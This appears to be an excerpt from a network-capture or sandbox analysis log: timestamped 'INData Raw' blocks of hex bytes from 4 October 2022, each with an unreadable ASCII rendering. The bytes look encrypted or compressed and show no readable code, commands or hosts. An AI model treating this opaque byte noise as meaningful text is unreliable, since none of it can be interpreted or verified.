                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28328INData Raw: 65 c4 e4 19 f7 7c f7 71 cf 2b 77 6e a4 91 1c 97 4c 48 59 9c f2 18 2a 34 3c 79 39 c3 31 76 39 33 8a 5f d8 54 5b 75 a0 5c a0 92 3f d5 b8 ea 93 90 7f 87 b0 e2 ea 84 2f 9a 2b 6c 9c f7 ec 88 14 ef 52 a9 4b 77 43 21 67 c0 fc d4 0a bd b1 04 df 3d a5 5e 31 ca c7 32 61 8e fa ef b2 c7 54 e1 18 d7 13 fa 47 42 34 18 5b 25 54 eb df e9 de 96 dc 6f 45 f4 ee 2e 56 28 f6 90 d1 5f 61 40 fd d7 11 3d 84 f5 ca 7d 8b 65 1c a7 bf 91 34 1d df f0 0e c6 55 ef d5 5f f0 6e 99 12 be 70 34 dd 10 58 ea 56 af 85 3e e8 51 34 a1 88 82 eb 6b 7e 19 c8 05 05 d9 70 66 30 fb 8a e1 b2 8e ab 1e 28 9f e0 38 6d d0 0e 23 3b 35 f2 47 97 ff a9 a5 47 07 eb d8 4c f1 d6 3e c7 7f d5 ec f6 5f 02 a2 8b d2 f8 82 25 29 b1 f8 e1 b1 a0 71 5d 35 c3 17 e6 b9 8c 6a 64 9c 19 98 1f c8 12 99 12 b7 30 e8 6f 64 73 40
                                                                                                                                                                                                                                    Data Ascii: e|q+wnLHY*4<y91v93_T[u\?/+lRKwC!g=^12aTGB4[%ToE.V(_a@=}e4U_np4XV>Q4k~pf0(8m#;5GGL>_%)q]5jd0ods@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28344INData Raw: cf 22 b2 97 c3 b6 1a c2 6f 45 d2 27 9f 45 37 72 f0 7b 07 af 1c 5a 1c dc 5d 8d 5b 7d 91 3d 83 81 5a 8b 59 70 7f e1 f3 c2 32 1a 95 76 7a c3 84 35 64 12 13 69 13 c5 fb 2e 5c 96 d2 b0 a4 1c a3 fb 06 c3 66 6e 36 ae 8f c4 76 56 4c ed aa c2 a6 d5 e0 7d 02 58 36 e8 be 74 9c 43 f2 5b 17 22 79 c0 2b 8d 80 1d b3 0a 80 3b 28 db 28 5d a7 8b f3 2b 09 3b 57 76 a5 9d de 36 a5 c9 81 36 b3 e1 4e 8a 83 9e 35 9f fd be bc fa bd e3 e5 57 a1 87 8f dc c9 4f de 38 ae a7 0d 38 7b b8 a3 1b 21 3e 8c 57 d4 db 3b 78 59 fe 47 e9 72 5c 79 3e 01 a2 84 18 a3 89 2e 85 f0 75 28 11 1c c5 9e 74 bc ad a1 93 bb 78 11 58 43 db a6 00 16 28 5f 7b 50 de 6b 3f dc 5f e8 35 db a3 e4 0c 22 17 a3 6d c4 a1 b8 94 67 51 4f 81 14 60 76 27 75 08 a1 b3 1e 18 2f 62 67 31 08 7c fe fb 72 d1 f3 85 2e dc 89 82 31
                                                                                                                                                                                                                                    Data Ascii: "oE'E7r{Z][}=ZYp2vz5di.\fn6vVL}X6tC["y+;((]+;Wv66N5WO88{!>W;xYGr\y>.u(txXC(_{Pk?_5"mgQO`v'u/bg1|r.1
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28360INData Raw: 5d 6c e2 c8 62 51 13 f9 01 7e 48 b6 61 7e 96 c1 c9 97 2f 51 08 85 00 4e 28 88 00 0f c7 40 63 dd a8 b4 e9 76 75 3d c8 35 6f 07 3b 37 83 98 d8 41 92 b5 13 cf 4b fd 75 e7 de 3d 3d d7 5e 52 a8 3d 5f be 07 6c 54 d7 81 55 c3 09 df e8 79 eb 81 1d 7f bf d3 2f 30 e4 b7 70 a8 01 60 27 73 f2 8b 58 af a8 e8 2d 5b 44 42 7e ba da 57 ea b7 8e f3 45 cc 9a 21 9b 17 06 71 9b 14 1f 97 98 0f 98 4f f9 45 94 e2 3d 89 85 20 99 91 e1 42 78 45 34 79 a4 45 97 88 aa 41 bd 10 32 21 92 3d be 92 97 a5 86 08 f4 2e c2 af bf 84 b1 3e 5a b4 d1 c7 a7 47 99 2b b2 ea 77 4b 2e 8d 3a 40 86 65 da e4 22 7b 4e 74 0a 39 f6 c5 34 45 86 5e 88 5e cb 9b 73 f7 27 1f f6 0a 2c 2a 44 f8 2c eb 80 91 d0 3f 04 16 88 63 ea d4 6a 34 57 92 7a 19 4a 2a c3 ea 94 90 05 92 32 3b b3 08 c6 dc eb 99 7e 53 36 20 91 8d
                                                                                                                                                                                                                                    Data Ascii: ]lbQ~Ha~/QN(@cvu=5o;7AKu==^R=_lTUy/0p`'sX-[DB~WE!qOE= BxE4yEA2!=.>ZG+wK.:@e"{Nt94E^^s',*D,?cj4WzJ*2;~S6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28376INData Raw: 2d 02 ba 55 8f dc 7e 53 9c 3c bd c6 91 cf 50 63 95 8a e4 d3 7a a0 5a 9d ce d2 63 d1 b9 93 73 15 45 79 e4 33 3b d6 60 00 9d 65 84 ea a9 14 65 cf ec a3 13 4e 6d 7b 53 d9 31 2e 5b cf 84 14 f9 75 1f ec 11 80 03 ed 72 ca 04 b9 10 8c 80 81 b7 3f 17 2f 08 4d 14 2a 29 1e e6 73 d5 c6 03 85 5e f1 92 a3 eb d6 da 63 61 93 c7 94 93 1b 7c 69 15 2a 45 ec 2b 39 b8 9e 28 67 d6 2f 64 c0 b9 f9 8f 90 40 09 05 66 b2 88 3f 3a 76 66 7a 7a 9e c9 4b 23 e7 f9 f7 cd a4 83 d5 ba 0a a1 7f 7c ae 38 a8 c7 34 32 69 30 c2 91 e1 33 0d 83 11 80 30 3d a2 1c b4 19 9f 07 2c cc 1e c2 aa 06 2d fb 61 80 3e 56 bd ab d8 70 4c d9 de 14 22 76 bc 68 dd 1f fb dc 3c 7c f0 8c 0f db 4d 70 1e d7 6c f1 8d 07 43 29 19 94 e5 12 4c cf dc 10 cb 1c 71 58 06 9c 18 b5 d2 36 fe 92 99 e7 cd ee 16 31 b9 e9 7e 32 07
                                                                                                                                                                                                                                    Data Ascii: -U~S<PczZcsEy3;`eeNm{S1.[ur?/M*)s^ca|i*E+9(g/d@f?:vfzzK#|842i030=,-a>VpL"vh<|MplC)LqX61~2
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28392INData Raw: 6e 59 74 fc a0 ce e9 45 9a 86 83 5a 25 0d d7 6f 31 e0 50 24 9f 18 e9 0b 5a 75 60 c5 ec 9f 56 d7 50 b0 98 f5 1d e9 0b 84 6a 3b d8 3f 95 b1 21 64 d1 be 86 ab f9 75 ba a2 68 50 4a 9f c7 80 2d b2 16 97 c7 6e 79 4b 7b cf ea 47 55 50 89 42 44 6f df db c0 ad 1a e2 5a a4 83 54 e3 19 ef d6 bc 98 e6 86 6e c7 26 b1 f9 7a 4f 06 54 cb 48 d5 95 c5 74 43 e1 ef 68 68 20 49 48 1f 11 fb 57 cd cf b7 e9 58 81 78 26 5d b8 2f 14 48 e4 8e 1a 07 06 c2 4f 91 9c 97 d4 e1 36 f2 bb 1f 28 4a 03 2d 2c 51 06 c0 e0 0b 12 4b 47 c6 fc 66 4e 1a fc db 64 79 1e d5 aa 1e b6 14 cb 0b a9 93 4a 1b 3e 9d 98 26 12 86 02 9a f7 83 bd cc 5c c4 b1 66 7b 28 b0 b8 4a 0e 87 ba b3 d3 f1 57 b2 b1 92 3b 99 06 c5 00 71 bb 6b 27 04 99 64 ee 52 67 cb b7 ab c2 b1 1b a7 3f e6 c3 85 3f 44 c3 dd 06 9d 01 1f 9f c8
                                                                                                                                                                                                                                    Data Ascii: nYtEZ%o1P$Zu`VPj;?!duhPJ-nyK{GUPBDoZTn&zOTHtChh IHWXx&]/HO6(J-,QKGfNdyJ>&\f{(JW;qk'dRg??D
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28408INData Raw: 4c 1a 0f 78 95 14 8b d3 f9 c6 ff 01 52 f9 20 54 89 f0 b5 bc 4f 83 dd 8b 69 c7 7d 17 79 34 30 2f 8b f8 37 47 0d 77 f3 9b 4b bc b8 b2 35 03 d7 b1 42 78 eb a1 1c 91 12 13 82 09 a3 35 ae db 78 58 47 e5 d0 5d 45 93 b5 68 43 d9 af bd b6 11 f1 58 5f 02 36 50 2f 71 f9 4c 99 b0 f1 c4 88 d8 2f c5 fd 34 05 b6 43 36 e8 d2 03 99 1c 99 04 fe e8 1f 1e c3 c6 cf 49 59 1a 8e d2 98 fc f6 43 46 06 d9 4f ad 13 92 21 c4 f3 e7 5a 7b 16 c4 fc 93 97 cc f7 3a d4 ad 2c 61 ff b2 9e d3 71 97 6e 45 25 de 38 a5 1d b4 bb 50 59 ad cf 82 2a e4 81 8a d4 80 b1 cb da 2d 6d 7e 9f 5b 17 fe 17 17 23 46 5c 0b d8 91 82 ed 3c 25 61 2e a9 5c 68 4d 06 b0 ca e7 cf 55 ce c0 5b f2 54 51 00 2f f7 49 bb 86 ae 21 44 30 1f a8 e8 2d bd 89 75 32 2b f8 58 ae 2e 70 ed 71 de f6 e8 38 8f cb 9f a7 cc 64 fa 11 f0
                                                                                                                                                                                                                                    Data Ascii: LxR TOi}y40/7GwK5Bx5xXG]EhCX_6P/qL/4C6IYCFO!Z{:,aqnE%8PY*-m~[#F\<%a.\hMU[TQ/I!D0-u2+X.pq8d
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28424INData Raw: da b8 0e 05 34 f4 c8 7a 66 bd b7 15 0d 39 45 14 81 ce 4a 47 03 06 3b bd e3 2b 3b 6d 38 3d 28 94 10 98 41 4c 75 81 d4 9a 8c 3f d3 71 14 26 30 d7 bf e1 9f 43 52 a3 ed 2f ec 91 89 71 eb 7c 60 48 25 d9 13 e1 b7 f6 db 6b 5c 84 8d a3 37 b4 18 96 0e 2b 17 37 75 15 be 34 6b 49 52 91 b0 cb 0c ee 2a c0 57 4b f4 45 3b 7c 54 61 de f8 47 4b 4c 25 2a b6 7c 2d bc 72 47 df c5 4f 31 e9 85 68 91 84 c3 f8 a4 f8 14 3b 84 c7 9e 69 a2 4b c0 b9 92 c1 a1 2b 8f 41 79 f4 5a a4 a9 c5 ff 66 f7 1e 1f f2 66 f6 5c 77 20 09 8a ce c7 76 36 d3 a0 87 ea e8 94 d4 51 0b 2e aa 45 90 e7 b2 bf 8f d4 17 c4 bd 05 12 76 78 51 6c 76 db 66 d6 08 9f ab 9b 26 03 ad 42 5f d7 f4 66 fa df cf 2a b2 11 82 e0 ba 81 86 aa e3 cd 14 01 e6 8d 8e a7 d6 56 b6 5f 0a 88 8c df a7 23 b2 e8 e1 53 97 3c 44 67 14 c3 85
                                                                                                                                                                                                                                    Data Ascii: 4zf9EJG;+;m8=(ALu?q&0CR/q|`H%k\7+7u4kIR*WKE;|TaGKL%*|-rGO1h;iK+AyZff\w v6Q.EvxQlvf&B_f*V_#S<Dg
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28440INData Raw: b2 a2 8c 6e da bf 6e 2d ce d1 4b 6d e9 97 2c 44 7a 78 9b 75 7b f1 2f 4b b4 a5 7f 49 a5 99 b9 64 32 1d 3e 4a 65 41 2d 01 d2 27 64 b3 1b f2 e6 c7 13 dd 8f ee f1 04 4c d8 29 d1 25 34 6e 54 5d 79 f0 b5 4c 0f c3 22 4b 47 6f ea 48 bb 0a 99 c9 4d cb 4a 16 8d 8b 4d 45 d4 b5 6a 8b 12 0b ea 0d bd 7a b9 ff 85 39 0a 0c 97 dd 83 bf aa 49 c7 a2 9a 13 6a 03 93 73 41 0d 5f 93 41 fb 8b 88 a3 0c f1 a5 ea bf af a7 53 71 09 38 d3 78 64 19 1d 60 cb e1 df 96 5f 77 3c 25 98 89 5c e7 37 60 e6 30 cf fc e5 70 94 b9 bb 52 84 dd 4e 8e fa 1e 86 90 ff a6 e6 5f ea c8 b3 9e 51 ed 39 50 a2 30 ff f1 0e 3b 03 4b ed 9d 9c f3 8a 4e 10 ae 8b 34 ca 45 bc 7c b5 d4 dd 4b c0 0e bd 2a ca 71 c6 9e cc a6 3b a3 e0 bc f1 1c b3 75 9c 48 9b 10 c4 7e 1c b7 b8 24 70 fb 7b 8e cf 85 a6 55 99 aa aa 76 59 ec
                                                                                                                                                                                                                                    Data Ascii: nn-Km,Dzxu{/KId2>JeA-'dL)%4nT]yL"KGoHMJMEjz9IjsA_ASq8xd`_w<%\7`0pRN_Q9P0;KN4E|K*q;uH~$p{UvY
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28456INData Raw: 21 60 2c b9 da 07 74 8c 03 67 e0 87 35 77 95 b6 c3 3b 8d d9 e0 52 62 ae e9 8a fc aa de 9e 9c 24 59 b8 fb 9a 27 78 34 a2 3d f9 a0 a0 38 79 ae 59 53 59 2d a7 67 d3 1a 29 15 ba 34 9a 30 05 88 e4 67 4b 35 3b 1a 4c 6f e5 9e 25 42 fc 6e c4 db 19 87 16 9e 7f b0 18 e7 b3 19 02 d0 3d e3 c6 f9 72 44 f3 df b8 10 5b fc 99 af 1b 85 9a 03 c8 49 62 33 a0 75 0e b8 0b 7b 69 bd 1a 98 d4 20 a0 7b a1 04 5e 07 d2 81 0b e9 29 10 3c 92 6e 8e fb 40 b9 ca 0f 2c f3 9a 18 7c 29 06 4d 08 b5 90 29 de 37 8b 98 a0 22 06 9d 16 76 38 41 52 a9 f7 35 41 57 45 7e b5 46 a3 b6 72 dd c0 c3 91 54 63 43 f5 8d 87 b7 a2 b2 a3 8c 95 d1 29 20 db b3 21 7f d5 4d 97 94 45 4e 7e df 5c a8 10 42 39 17 1d 55 1a 84 4e 5a 91 a4 34 bf 9c 54 18 59 01 39 4a f0 db a3 86 4c 36 27 a9 a0 95 88 21 93 73 7b bf da e1
                                                                                                                                                                                                                                    Data Ascii: !`,tg5w;Rb$Y'x4=8yYSY-g)40gK5;Lo%Bn=rD[Ib3u{i {^)<n@,|)M)7"v8AR5AWE~FrTcC) !MEN~\B9UNZ4TY9JL6'!s{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28472INData Raw: 84 51 48 7f 45 1c 85 48 97 25 36 e8 f0 7c 39 6d f0 b8 a7 4c 51 a9 0b 43 45 fa 37 3d b0 bd 7b d3 37 f8 c6 2a 0a 8f b2 04 ca 80 5f 07 b3 08 aa 53 00 ee 00 96 8f f7 e1 75 c1 e7 7b 32 ac 52 b5 65 5e 1e b1 b9 cf f3 06 64 90 80 b5 99 0e e9 04 bc db 4d 66 b1 ea 8b a3 de e3 b3 6a c5 d3 1f 54 f6 d5 71 fa 79 e7 de 57 8d 55 f1 22 2a 86 e2 74 8f 1d 69 2e b2 07 40 ee 90 2b 4a 72 de 7a 4d a0 e0 dd a4 c4 99 b7 65 52 80 d8 90 95 20 b6 6a 49 97 45 9f eb d9 74 2c 4a e8 48 87 d4 eb 76 b8 2f 6f 6c 8d 7a bb 3d 3d e4 d4 42 e2 fb 94 d3 8a 9d e4 61 95 0b 53 58 c7 a2 4d a1 af 4f ec 89 13 2e 58 69 15 4c 2c 31 3e dc 77 aa 0e 16 a7 8c 98 40 e6 31 9d 89 51 64 da 15 73 0a 44 70 1c f2 6e 48 f0 02 13 80 c6 a6 10 b4 77 59 25 af d8 b8 6a b5 38 d8 bc 2c f3 f9 e8 38 b9 eb 6a 86 a2 76 48 8e
                                                                                                                                                                                                                                    Data Ascii: QHEH%6|9mLQCE7={7*_Su{2Re^dMfjTqyWU"*ti.@+JrzMeR jIEt,JHv/olz==BaSXMO.XiL,1>w@1QdsDpnHwY%j8,8jvH
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28488INData Raw: 60 3d 29 35 57 29 05 c0 70 3e a4 10 71 5c 52 23 50 a3 28 25 9c d8 34 81 22 f0 d3 d6 1d 66 94 6f 5d 78 e0 29 76 7e c4 4a a0 7a eb 0d 79 08 c3 9c a1 f1 de 6d f1 d3 50 73 f6 49 6f 8f d3 ff 35 c8 d6 5e 5a 04 d4 c9 aa d3 3a 3c 16 20 a9 c0 9e 62 5a ee 18 47 47 d7 55 0e 2f 18 a5 a6 f6 f4 bd 87 7f 60 b4 6f 43 ac df 8b 5c 3c 95 00 04 b5 d5 3a 80 68 f5 c6 11 2a 86 49 e8 e9 6e a5 18 3f a2 0d 1f 13 2f d4 a6 68 4a 11 6b d5 a6 78 b4 71 9e aa ad 27 e7 77 65 e2 a8 6a 76 39 44 4a 97 b8 4a 6c a4 c3 05 84 ce ee a4 c5 9a 1e aa d7 b0 a4 7b 9a 50 98 43 87 58 e6 b2 4b b9 1a f0 1b 8c 49 0c e9 ca 28 ca 90 76 ef b7 60 d7 db 68 4b ab 22 9c 65 6b c7 b0 cd 71 5e c3 17 77 9b 7a c8 8f 49 37 5a fb df 2c fb 74 46 cf b2 c7 7b 00 aa 23 9e 4e b4 4a 20 d9 f9 d8 42 62 25 93 a9 67 6b 9a b7 fc
                                                                                                                                                                                                                                    Data Ascii: `=)5W)p>q\R#P(%4"fo]x)v~JzymPsIo5^Z:< bZGGU/`oC\<:h*In?/hJkxq'wejv9DJJl{PCXKI(v`hK"ekq^wzI7Z,tF{#NJ Bb%gk
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28504INData Raw: 72 48 9a d4 a1 78 8b 7e ad f1 89 c8 4a 17 37 e6 27 a3 b7 50 0b a2 9f 2a b9 1c d0 e9 70 b1 f5 67 a5 34 1d 90 a8 14 17 d0 08 f4 7d 81 b5 c5 a5 37 e7 1d 0b 19 15 ab 31 c3 17 64 c9 ea e0 c6 b1 9e eb ff 74 a4 03 97 06 e9 fb 9b c8 57 94 e0 d5 a6 b3 13 96 37 a6 81 b4 31 8e a6 e4 9c 79 11 e8 05 f2 cc 1c 83 7b a0 01 ba 7c 2e ac 54 ef ad d6 3d c9 e7 2a ed e1 e2 d5 34 1e 15 c2 2c 67 70 07 9d 80 ea 79 97 47 9a c2 0d f8 29 10 5d 52 d8 c0 e3 07 2a 0a 2a 1a 25 8b 77 b4 19 03 3b a6 e9 8d 89 a3 2f 6d 95 52 36 54 c6 49 1c de 13 12 aa 5a 5c 6e d8 68 0b 18 fc d7 2b d0 98 59 85 15 a5 16 13 34 c5 97 9f e1 a0 a1 49 79 fe 0a be bd 61 e7 59 35 35 69 7f 9f ff f8 6b 35 60 fb 99 3c 2d be ef 6b be 9d 46 a2 ce ba 00 29 14 c2 14 d7 a6 d3 29 73 5e eb 01 00 cf ac db 18 23 8d 1b 3f a8 b6
                                                                                                                                                                                                                                    Data Ascii: rHx~J7'P*pg4}71dtW71y{|.T=*4,gpyG)]R**%w;/mR6TIZ\nh+Y4IyaY55ik5`<-kF))s^#?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28520INData Raw: cf 8c d2 1b 1b 77 83 c7 3a 9c cd 38 60 a9 85 9c ed 42 aa 58 10 54 4a f6 6b 1f cc d5 f8 28 9f ca 04 11 74 97 3a 40 f9 8a 42 97 9a ae 4d 4e 69 b1 10 db fd 68 f9 e3 cc 5a 98 43 06 de ad 36 29 e2 fb 58 6b 83 1b b8 b0 3d f5 bc af ca b1 92 54 16 9f 31 8c 4d 17 fe 5d 2f e9 d2 09 3e 4f 04 27 d7 2c 91 ef 8a 5b ef c9 cc 10 3d 2d c6 70 ca 47 94 d0 10 c7 e5 45 81 e3 7a 98 94 07 17 04 24 36 01 e8 54 73 a8 49 64 1d 1b eb 3c c6 73 e4 31 86 32 f9 8d b9 c7 f5 ea 5c 5f 93 1d 77 5b 7f f4 e5 51 eb 0c 41 2b de 40 bf 6d 82 cd 2e 3f 11 1f 6d c5 fa 56 8f ea da 8f 77 cf 53 4e f8 81 68 61 c6 7a a3 5d 51 d4 d9 6b 84 02 e1 da 38 21 87 bf 95 f3 74 fe a1 b4 3a c4 67 f2 2d cc c0 4b c7 a6 41 fc fd 9c ba 0c e4 03 6e e8 17 1b fc 7a 65 9d eb 9a a8 20 05 fa 7a fb 36 3d 00 37 a8 c7 c9 8a c6
                                                                                                                                                                                                                                    Data Ascii: w:8`BXTJk(t:@BMNihZC6)Xk=T1M]/>O',[=-pGEz$6TsId<s12\_w[QA+@m.?mVwSNhaz]Qk8!t:g-KAnze z6=7
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28536INData Raw: 7c e4 3d bc c3 ec d2 ea b7 14 54 77 df 13 99 65 c7 53 d7 98 da d0 22 12 90 37 9c 4d 66 09 5b 6d 39 42 55 42 47 75 23 f8 aa 94 f8 6c b5 f6 8e ee 89 56 ff 03 32 a1 75 9c 4c 1d c9 35 f5 d0 22 51 f0 5b b1 54 35 9f bd 78 6a 2c 60 d4 9b 62 aa 5d db 22 47 fb d7 c0 66 23 0d a7 e6 6e 8b f1 14 d4 53 49 f2 2f 4e b8 35 40 26 5b 65 eb f4 e1 35 21 c9 78 fc 2d b7 a4 c4 95 8c 36 f4 91 69 13 9d 07 17 3e da 38 25 e0 44 fb 50 46 11 c8 86 7d 4a 78 aa 28 fa 96 8f a0 98 ad 42 b2 85 20 b2 f5 1e 28 a8 33 38 7c 96 e1 9b 12 9c 68 83 64 03 9f 41 59 47 61 8b 69 09 3c b4 66 aa 3d 5e 4a 1d 91 c1 35 3f dc 91 8f 99 16 73 e8 07 3d 42 a3 e4 a4 19 44 52 99 66 21 75 33 0b b2 80 68 b2 3e 69 a3 87 93 5b d0 c9 af df d2 28 8d 45 93 e1 ab d4 67 fc f1 c8 67 c7 91 7e 63 41 48 b0 1c b7 e6 03 ea 25
                                                                                                                                                                                                                                    Data Ascii: |=TweS"7Mf[m9BUBGu#lV2uL5"Q[T5xj,`b]"Gf#nSI/N5@&[e5!x-6i>8%DPF}Jx(B (38|hdAYGai<f=^J5?s=BDRf!u3h>i[(Egg~cAH%
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28552INData Raw: 4c 2f c1 8d 16 13 6b 54 ce a2 d5 31 67 67 d1 36 26 fc ad 25 2d 0b 82 b1 50 09 f5 c4 ad 83 d6 7b 71 7a 91 47 dd c4 36 62 92 c7 dc 04 d7 5a b4 a6 82 40 0b a6 a1 70 cc a4 72 4c 71 13 b3 dc 37 64 b8 39 a2 da e9 38 42 cb 86 be 4c c5 84 10 2f fb 0e 9e 9a 2e 71 64 90 2e 8c 6b c8 9b 61 51 63 94 4b 83 53 f8 a6 db 3a ad f7 ac c1 0b d4 0d 6d 18 67 5b 7f 78 a0 f6 21 7f c3 93 47 27 2b 0d b2 eb 3d 25 b1 fb 98 b7 4b ad f3 71 7a 0b cc 31 a7 fe 7b ee ad 21 2b 38 aa d9 fe 18 9f 18 18 61 09 5b 44 9e ab 39 28 32 9b e0 7a 8b 40 b7 d9 37 84 11 24 fc 1f a0 df 5c 2d c3 60 68 bc 19 77 d7 c5 20 5e a6 5a 90 7d 3a fc 40 86 cb 6b 71 44 c9 b0 66 ed 46 e1 fe df 26 f9 96 03 5b 86 ed 40 cc c3 18 36 4e 38 3e c1 c7 90 c3 3d 77 eb 54 50 24 57 fe 81 d8 b8 d3 55 2f 9b 07 b9 7c a7 2b 3c ab 88
                                                                                                                                                                                                                                    Data Ascii: L/kT1gg6&%-P{qzG6bZ@prLq7d98BL/.qd.kaQcKS:mg[x!G'+=%Kqz1{!+8a[D9(2z@7$\-`hw ^Z}:@kqDfF&[@6N8>=wTP$WU/|+<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28568INData Raw: 66 bb ac 7e fc 93 0c a6 0c 3a 03 28 05 79 ab 78 d3 5d a7 61 23 6f df e3 16 cf 10 e1 b5 89 87 21 ad df a8 da fb e8 56 b7 bd 62 85 d4 69 f8 35 c9 11 e0 4a 06 93 ab 51 1c eb be c1 35 80 f8 ff 36 33 2c ae 0f c7 26 49 bc 14 e2 01 4b 85 10 23 40 17 39 39 a2 01 f4 a7 f5 0b 99 d9 5a 6e fd 39 91 a6 f5 a9 68 ac 4a 08 34 01 92 b4 85 b2 a7 99 ce c1 78 fe bb a3 dd 07 b3 2b 2d ed b3 87 5d dc 5a 18 f3 c3 06 5e 65 a9 1c a8 9a b9 53 34 48 d7 65 ac b9 99 6e 9d ca 4e db bb 75 48 70 ae 1e c5 48 52 b6 56 cd c8 22 bd 86 1c 1d cb 7e 21 7b 6b b2 42 84 e4 33 ce bb 5f 4e 85 0c 83 34 c5 48 e4 32 a4 22 1a f6 65 ee 75 bc cb 69 23 84 09 c2 4b 69 d0 61 92 c5 18 69 e4 0d 8b 11 08 81 70 39 a9 c4 9b 5a 89 bc 73 a4 3e b4 58 01 a4 48 b9 bc e7 72 62 8d f8 37 9d 52 8b a8 91 52 45 23 5f ce 4e
                                                                                                                                                                                                                                    Data Ascii: f~:(yx]a#o!Vbi5JQ563,&IK#@99Zn9hJ4x+-]Z^eS4HenNuHpHRV"~!{kB3_N4H2"eui#Kiaip9Zs>XHrb7RRE#_N
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28584INData Raw: ff a1 18 cb 8c d3 32 1b 89 cc 00 74 7b 6a 8e c8 5e 5c 34 ad 35 c8 a4 40 98 5e f8 e3 40 a5 f9 5c 2c 41 2e 20 99 21 8b f6 e1 c2 4c 6f 2f 36 11 6d b4 94 41 ce 6d bc 5d 81 c8 95 d7 53 4f 17 b2 74 ed 0a 6e 51 a0 9b f8 3a e0 52 f3 d2 43 ca cf 3c a7 19 22 c0 86 f7 51 dc e7 d8 1a 13 2f d0 6d 82 7b 4e f9 1c 82 9c 16 75 b3 21 b9 de b3 05 97 6d 65 0f 11 34 20 61 c1 23 aa ad eb a2 15 bc 0f b5 b4 ec 43 42 b0 a0 40 09 34 57 f9 65 79 b2 d9 7b da 66 44 ca 3b e0 3e 09 21 36 c1 a6 e5 0a f0 6b 1e 15 9d 46 74 ba 7b a4 d1 f6 a8 69 45 83 29 7c 19 c6 f4 6a 89 bf 48 65 f4 b5 ff d8 20 50 36 08 d9 fb 6e 66 87 f4 7c 66 fc d6 90 db bc 27 1c 0d 74 16 b4 4d 9e 80 c4 c9 ec 9a 11 c2 03 2e bd 1b 47 6b 0b b3 8c 25 bf 17 a6 be d9 66 2b ca 80 65 aa 33 25 73 8e 60 37 87 16 77 1d 27 93 3d 97
                                                                                                                                                                                                                                    Data Ascii: 2t{j^\45@^@\,A. !Lo/6mAm]SOtnQ:RC<"Q/m{Nu!me4 a#CB@4Wey{fD;>!6kFt{iE)|jHe P6nf|f'tM.Gk%f+e3%s`7w'=
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28600INData Raw: 11 8b cf 4d b5 03 36 4d f9 67 5d 64 ed 4f f9 c4 0d 69 40 df 55 06 d3 e5 02 02 ad 28 24 7d 6b d4 9e 6c f8 6b e1 44 39 de 06 12 b8 a8 f1 2e da 77 1c 56 87 43 4c 54 e8 19 bc c3 eb a6 9f 47 33 b4 70 24 b4 c9 b4 ae af 43 ea 4c e1 63 be 33 8a eb ca be da 67 14 51 52 f6 cd 00 66 ba ca b3 49 7c f5 f8 14 bd cd 78 e8 f2 35 13 05 93 79 17 2c 5b bb 49 40 9b f1 f7 b7 0e 93 ce 1b 34 25 17 4b b5 ba 50 e0 6c fd db b2 75 05 8d 62 76 82 68 f2 46 6c 36 da 8d fa 84 c0 cc 71 1f e2 8e b2 3e 5f 4c 82 71 11 49 2c 92 cd e8 a5 8d e0 52 7b 0b 48 50 ab c7 9b a4 e5 8f a5 fc 9f ba 33 2d 7b a9 13 68 30 2a d0 f4 2d 72 0d c7 61 81 3f 9b 58 8f 81 b8 03 ad 6e cd 53 4e db 0e ee 2b 4f 3c 9e 19 f4 e3 e5 1a 75 82 01 0d fd 3c 77 eb ee 43 c2 4a cb 1a 44 0f d4 d6 d0 be 79 71 35 12 f1 b3 9b 59 6d
                                                                                                                                                                                                                                    Data Ascii: M6Mg]dOi@U($}klkD9.wVCLTG3p$CLc3gQRfI|x5y,[I@4%KPlubvhFl6q>_LqI,R{HP3-{h0*-ra?XnSN+O<u<wCJDyq5Ym
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28616INData Raw: bc 0d 61 da b3 08 6d b7 10 61 75 ad 6f d0 8d d8 ab ab 24 52 70 54 c7 9b fa 30 31 b8 01 ec 4b 6d cf 4f bc 09 cb c6 0c 7d 73 d2 19 5d 89 34 93 cd 91 26 40 a1 2c 27 dd 2e 95 1a 0f 53 34 90 47 f6 dd 00 0a 0d 6c 7f 0c 93 ba 59 67 4f c6 6a d7 ea e7 e9 b2 e3 5e 67 a9 4a 7e 05 11 fe b1 a9 79 22 68 d5 d1 d1 5e 58 c5 21 22 0a 35 df 62 81 22 96 b4 51 c1 e1 50 b8 8c f1 05 ce 7a 00 8a dc f2 5f 93 2a 7b 74 c1 22 8f 07 25 2c a2 9a f9 bd da be 10 77 e6 e7 dc c2 67 d1 a8 13 0f 60 83 ce eb 85 1d 98 2d e1 0f 37 f0 a3 da 36 cc d8 8e f5 85 3b 40 42 61 8b ca 1a 34 17 00 93 f3 7a 52 28 b0 8c 52 56 42 f7 a9 8a 34 59 56 5c 18 ce 59 91 e9 d1 ec 0a 35 04 03 a8 49 ce 7b 78 e6 b9 2b 25 bb 3a 51 4b 62 60 a1 81 7b 02 36 e0 aa 31 3a 11 c8 6d 13 2f d5 50 7e a0 98 86 92 29 00 e2 fa b6 3c
                                                                                                                                                                                                                                    Data Ascii: amauo$RpT01KmO}s]4&@,'.S4GlYgOj^gJ~y"h^X!"5b"QPz_*{t"%,wg`-76;@Ba4zR(RVB4YV\Y5I{x+%:QKb`{61:m/P~)<
